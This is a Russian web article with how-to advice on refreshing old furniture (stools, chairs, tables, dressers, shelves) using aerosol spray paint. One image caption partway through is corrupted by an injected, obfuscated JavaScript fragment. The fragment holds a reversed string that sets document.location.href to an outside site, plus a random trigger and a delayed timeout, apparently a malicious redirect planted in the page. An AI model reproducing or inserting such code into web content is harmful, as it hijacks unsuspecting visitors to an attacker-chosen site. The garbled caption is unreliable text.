Добавить в закладки

Реконструкция мебели аэрозольной краской за 5 минут

Многие из предметов мебели быстро теряют первоначальный цвет и соответственно презентабельный внешний вид. Не нужно спешить их выбрасывать, ведь исправить ситуацию и вдохнуть новую жизнь в мебель поможет реставрация при помощи аэрозольной краски.

Аэрозольная краска

Аэрозольная краска. Источник: www.1000statei.ru

Аэрозольная краска, находящаяся внутри балончика очень проста и удобна в использовании, ведь все что вам нужно это нажать на распылитель и покрыть слоем дерево.

Табуреты и столовые стулья

Если у вас потрескались или поблекли табуреты аэрозольный покров будет как нельзя кстати. Все, что вам нужно это поставить их на клеенку и равномерно распылить содержимое балончика.

Процесс распыления краски на табурет

Процесс распыления краски на табурет. Источник: newtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton.ua

То же самое касается скучных обеденных стульев с мягким сидением и спинкой. Прежде, чем разбрызгивать краску, застелите сидение пленкой, чтобы ткань не испортилась.

Обновление мягкого стула

Обновление мягкого стула. Источник: www.abkhazeti.ru

Использовав яркий цвет, вы прибавите кухонному или столовому помещению ярких красок.

Столы любого предназначения

Журнальные, прикроватные и даже обеденные столы также подлежат восстановлению с помощью аэрозольной краски.

Обработка столика аэрозолем

Обработка столика аэрозолем. Источник: www.wikihow.com

Прибегнув к данному методу можно навсегда избавить помещения от надоевшего однообразия и добавить новых цветных акцентов.

Обновленный столик

Обновленный столик. Источник: www.wikihow.com

Комоды

Старые комоды также легко преобразить аэрозолем. Винтажная мебель нынче в моде, а для создания нужного эффекта прикупите новые симпатичные ручки для выдвижных ящиков и нужный оттенок краски, которая доступна в большом ассортименте.

Обновленный комод

Обновленный комод. Источник: kallibry.ru

Стеллажи и полки

Приелся цвет книжных стеллажей или полок? Не проблема, ведь у вас теперь под рукой чудо-средство, способное избавить вас от навеянной тоски. Просто освободите полки от книг, обработайте их спреем нужного оттенка, а после просушки поверхностей наслаждайтесь новым эффектом.

Переделка книжных стеллажей

Переделка книжных стеллажей. Источник: i.pinimg.com

Легкость применения аэрозольной краски позволяет использовать ее для любых предметов. Попробуйте преобразить вашу мебель и убедитесь в этом сами.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 18.05.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: